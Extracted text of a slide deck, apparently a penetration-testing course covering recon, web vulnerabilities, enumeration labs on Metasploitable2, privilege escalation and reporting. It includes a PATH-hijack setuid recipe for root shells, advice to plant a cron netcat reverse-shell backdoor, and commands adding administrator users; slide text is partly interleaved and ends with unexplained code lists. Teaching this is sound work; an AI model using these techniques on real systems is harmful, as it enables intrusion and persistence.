Practical Penetration

Testing
Fatih Çelik Berkay Aksaray
Security Engineer @ Trendyol Sr. Security Engineer @ Trendyol
AGENDA
1.Introduction 4. Exploitation
a. Introduction to Pentest a. Exploitation in Web Security
b. Penetration Testing Process
b. Exploitation in Network Security
2.Recon & Scanning c. Exploitation in Kubernetes
a. Nmap
5. Documenting
b. Port Scanning
d. Report Standart
c. Nmap & Wireshark Lab
d. Information Gathering In Web 6. Q&A
Technologies
3.Enumeration
a. Enumeration of Services
2
INTRODUCTION
Penetration Testing Process
Recon

● Recon
● Scanning
● Enumeration
● Exploitation Documentation Scanning
● Documentation

Exploitation Enumeration

4
Reverse & Bind Shells

Ref: https://silviavali.github.io/blog/2019-01-25-blog-SLAE2/

● https://www.revshells.com
5
RECON & SCANNING
Recon: Nmap & Port Scanning

7
Recon: Nmap & Port Scanning

8
 Recon: Nmap & Port Scanning
● https://highon.coffee/blog/nmap-cheat-sheet/

9
 Recon: Nmap Scripting Engine

● safe:- Won’t affect the target

● intrusive:- Not safe: likely to affect the target
● vuln:- Scan for vulnerabilities
● exploit:- Try to exploit a vulnerability
● auth:- Attempt to bypass authentication for running services
● brute:- Try to brute force credentials for running services
● discovery:- Attempt to query running services for further information about the
network

● $ nmap --script-help <script-name>

● https://www.digitalocean.com/community/tutorials/nmap-switches-scan-types

10
Recon: Nmap & Wireshark Analysis

11
 Recon Lab: Nmap & Wireshark Analysis

● Let’s scan vulnerable machine with different parameters

● Analyze the outgoing packages with Wireshark
● What are the differences?

12
Introduction to Application Security Vulnerabilities

● Discovery Techniques
● Definition of Application Security Vulnerabilities
● Importance of Addressing Security Vulnerabilities in Applications
● Overview of Common Types of Vulnerabilities: Authentication, Authorization,XSS,
SQL Injection, OS Command Injection, RFI & LFI, and File Upload

13
ENUMERATION
Web Application Discovery Techniques
● Information Gathering
● Analyzing the Source Code
● Content Discovery

15
Information Gathering
● Google Dorking: Use specific search queries on search engines like Google to find
sensitive information and hidden web pages.
● Directory and File Enumeration: Use tools like DirBuster or Gobuster to find hidden
directories and files on the web server.
● Subdomain Enumeration: Use tools like Sublist3r or Amass to discover subdomains
related to the target domain.

16
Information Gathering - Google Dorking
● Intitle: Searches for specific words in the title of a webpage. For example, intitle:"index of
/backup" will find directories named "backup" in the title.

17
Information Gathering - Google Dorking
● Inurl: Searches for specific words in the URL. For example, inurl:admin will find pages with
"admin" in the URL

18
Information Gathering - Google Dorking
● Site: Limits the search to a specific site or domain. For example, site:example.com confidential
will search for "confidential" only on the site example.com.

19
Information Gathering - Google Dorking
● Cache: Displays the cached version of a website. For example, cache:example.com will show Google's
cached version of the site. Here is the syntax to find the cached version of
yahoo.com.cache:https://www.yahoo.com

20
Information Gathering - Directory and File Enum
● Gobuster: is a directory and file brute-forcing tool written in Go programming language. It works similarly to
DirBuster but is more lightweight and can be faster in some cases.
■Wordlists: Gobuster supports different wordlists. You can use the built-in wordlists or specify your own
custom wordlist.
■Extensions: You can specify file extensions to search for specific file types within directories.
■Threading: Gobuster allows you to configure the number of concurrent threads to speed up the scan.

gobuster dir -u http://example.com -w /path/to/wordlist.txt -t 50 -x .php,.html -o output.txt

-u: Specifies the target URL.

-w: Specifies the wordlist file containing directory and file names.
-t: Sets the number of threads (concurrent connections).
-x: Specifies file extensions to look for within directories.
-o: Specifies the output file to save the results.

21
Information Gathering - Subdomain Enumeration
● Sublist3r is a Python-based tool designed for
subdomain discovery. It enumerates
subdomains using search engines, various APIs,
and web scraping.
■Sources: Sublist3r queries search engines
(like Google, Bing, and Yahoo), public
databases, and online services to find
subdomains associated with the target
domain.
■Bruteforcing: Sublist3r can also perform
brute-force attacks to discover subdomains
by trying common subdomain names.

22
Information Gathering - Fingerprinting
● Wappalyzer: is a browser extension and
command-line tool that detects technologies
used on websites. It can identify a wide range
of technologies, including web servers,
programming languages, content
management systems (CMS), frameworks,
analytics tools, and more.

23
Analyzing the Source Code
● Page Source Analysis: Examine the HTML source code for potential security
vulnerabilities or sensitive information exposure.
● JavaScript Analysis: Analyze client-side scripts for security issues like DOM-based XSS
or insecure data handling.
● Mobile App Analysis: If the web application has a mobile component, analyze the
mobile app's behavior and communication with the backend.

24
EXPLOITATION
Cross-Site Scripting (XSS) Vulnerabilities

● Definition of XSS Vulnerabilities

● Explanation of Stored XSS, Reflected XSS, and DOM-based XSS
● Impact of XSS Attacks: Data Theft, Session Hijacking, Defacement
● Prevention Techniques: Input Validation, Output Encoding, Content Security Policy
(CSP), HTTP-Only Flag
● Some useful sheets;
○ https://xsshunter.com/#/
○ https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
○ https://webhook.site/

26
Cross-Site Scripting (XSS) Vulnerabilities

27
Cross-Site Scripting (XSS) Vulnerabilities

28
SQL Injection Vulnerabilities
● Definition of SQL Injection Vulnerabilities
● Explanation of SQL Injection
● Impact of SQL Injection Attacks: Data Theft, Data Breaches, Authentication Bypass
● Prevention Techniques: Implement prepared statements and parameterized queries
or use Object-Relational Mapping(ORM) libraries/frameworks that automatically
handle SQL operations and validate and sanitize user inputs on server sides.

29
SQL Injection - Vulnerability

30
SQL Injection - Vulnerability
What is the differences between these two code snippets?

31
OS Command Injection Vulnerabilities

● Definition of OS Command Injection Vulnerabilities

● Explanation of Command Execution through User Inputs
● Impact of OS Command Injection Attacks: Remote Code Execution, Data Loss
● Prevention Techniques: Input Validation, Avoiding Shell Commands, Using Safe APIs

32
OS Command Injection Vulnerabilities

33
File Upload Vulnerabilities
● Definition of File Upload Vulnerabilities
● Risks of Malicious File Uploads: Remote Code Execution, Defacement
● Prevention Techniques: Validating File Types, Storing Uploads Outside Web Root,
Setting Proper File Permissions

34
File Upload Vulnerabilities

35
 Enum Lab: Enumeration Port by Port

● https://pentestbook.six2dez.com/enumeration/ports#general
● Try these techniques on your vulnerable machine
● Which tools do you use?

36
 Enum Lab: Port 21 - FTP

● What’s the vulnerability of FTP service?

● How can you exploit it?

37
 Enum Lab: Port 445 - SMB

● What’s the vulnerability of SMB service?

● How can you exploit it?

38
 Enum Lab: Port 514

● What’s the vulnerability of this service?

● How can you exploit it?

39
 Enum Lab: Port 2049 - NFS

● What’s the vulnerability of this service?

● How can you exploit it?

40
 Enum Lab: Port 3632 - Distccd

● What’s the vulnerability of this service?

● How can you exploit it?

41
 Privilege Escalation Lab

● Outdated Binaries/Kernel
● Running Services as Root
● SUID Executables
● Sudo Misconfigs
● Cron Misconfigs
● PATH Misconfigs
● …

● https://payatu.com/blog/a-guide-to-linux-privilege-escalation/
● https://book.hacktricks.xyz/linux-hardening/privilege-escalation
● https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20
Resources/Linux%20-%20Privilege%20Escalation.md
● https://gtfobins.github.io/

42
Privilege Escalation Lab

● Can you find all SUID binaries?

● How can you exploit?
● find / -perm -u=s -type f 2>/dev/null
● Run below command on metasploitable2 and your machine. What’s the difference?
○ nmap -sS 127.0.0.1

43
Privilege Escalation Lab
● ssh with msfadmin:msfadmin to machine
● Privilege Escalation with Sudo
● Let’s say you can run Vim with sudo?
● Can you elevate your privilege via Vim?

44
Privilege Escalation Lab
#include <unistd.h>
● Can we exploit PATH misconfig?
● #cd /home/msfadmin/test
● #chown msfadmin:msfadmin test void main()
● #gcc test.c -o script {
● #chmod u+s script setuid(0);
● $export PATH=.:$PATH setgid(0);
● $touch ps && echo “/bin/bash” > ps && chmod +x ps && ./script system("ps");
}

45
 Privilege Escalation

● Find kernel version. Is is vulnerable?

● cat /proc/version
● uname -a

46
 Privilege Escalation Lab

● Outdated Binaries/Kernel
● Insecure Service Permissions
● DLL Hijacking
● Unquoted Service Paths
● Scheduled Tasks and Cron Jobs
● Password Attacks and Credential Sniffing
● …

● https://0xsp.com/offensive/privilege-escalation-cheatsheet/

47
 Post-exploitation Techniques

● Adding Back Doors; The process of adding a backdoor can be done in various ways,
but the most preferred method is creating a reverse shell with netcat. The reason
bind shell is not used is to avoid exposing the system to attackers during penetration
testing.

For example, on Linux, the netcat command can be added to scheduled tasks to
open a reverse shell to your IP every 5 minutes.

48
 Post-exploitation Techniques

● Adding OS User;
Windows:
- net user test test /add
- net localgroup administrators test /add
Linux:
- useradd test
- passwd test

49
Lab Machine - I

50
Lab Machine - II

51
DOCUMENTING
Report

● Clear Executive Summary

● Detailed Findings
● Methodology
● Risk Assessment
● Recommendations
○ Compliance and Best Practices
● Evidence and Proof of Concept (PoC)
○ Screenshots and Logs
● Secure Delivery
● Legal and Ethical Considerations

53
Q&A
THANK YOU FOR
LISTENING
phcidclearn01 => b45c60e36b270dbd
phcidclearn29 => 51addcee0e20d7f8
phcidclearn02 => 910df70bdb3a952a
phcidclearn30 => d7244e785e2ea355
phcidclearn03 => 01a57f16b47e2ac6
phcidclearn31 => 9f761e9036f79be5
phcidclearn04 => b88382f4ccf2556a
phcidclearn32 => 111c65dbba3ea1ff
phcidclearn05 => c0a7690849c3dc5a
phcidclearn33 => bf71b8c68be3effc
phcidclearn06 => 4c23afc417b6b93b
phcidclearn34 => b0d7552ff0b09b8b
phcidclearn07 => d8648db635a0cb3b
phcidclearn35 => bd8eb60b3fc0d6b4
phcidclearn08 => 3d22f8d7c1dcf182
phcidclearn36 => 66b1b1cd756a5895
phcidclearn09 => cb9c32a94adeb460
phcidclearn37 => 5049430bc406e0c2
phcidclearn10 => 5373acb6ecbdf8a0
phcidclearn38 => e6a0074cf9f3fdd5
phcidclearn11 => 062fb5e229a9971e
phcidclearn39 => 8ff227b11e850ab1
phcidclearn12 => fa109bddf00f3eb7
phcidclearn40 => d6a3346472a1facb
phcidclearn13 => 02992b91fc58be99
phcidclearn41 => 5cd823c815f2487d
phcidclearn14 => d8e161830b94d965
phcidclearn42 => 7a588c6267672418
phcidclearn15 => 114021bd00b427f2
phcidclearn43 => 9cf1662e68fc064d
phcidclearn16 => beb4635e9f8af0a0
phcidclearn44 => a177c42355854cdb
phcidclearn17 => d2fbd62c0cb95abf
phcidclearn45 => 6792546b25fb45e2
phcidclearn18 => 96f71caf8993f53d
phcidclearn46 => abb96db57c1e7052
phcidclearn19 => 3a0381d7c5cf422f
phcidclearn47 => 6b93c90b3d57efaf
phcidclearn20 => b6b3a2cd70bc713f
phcidclearn48 => 2c41cf25b1cb8e2e
phcidclearn21 => 79e2ef23084b8f0c
phcidclearn49 => a317e6a59586b216
phcidclearn22 => 0697540c8d7c96a7
phcidclearn50 => d27a26ac3785abde
phcidclearn23 => b9c04e81bd08fc16
phcidclearn51 => acd60a5ddfb584f9
phcidclearn24 => 329e2d127abd9806
phcidclearn52 => 41b93ba187ef32c6
phcidclearn25 => dc3dd1e66ae68937
phcidclearn53 => 031b698aa6539951
phcidclearn26 => c59eb5040c3d7b09
phcidclearn54 => 94e51f411917d986
phcidclearn27 => 209e29c2b3dfc638
phcidclearn55 => 29419f2740ee765b
phcidclearn28 => b790cc9f9b369687
phcidclearn56 => 7aab3e2725dd117b
phcidclearn57 => 985f532d5adc9541
phcidclearn58 => c8e793c2b8cdd59c
phcidclearn59 => b772219d7d82a4f3
phcidclearn60 => 5d1fc3759f62fd52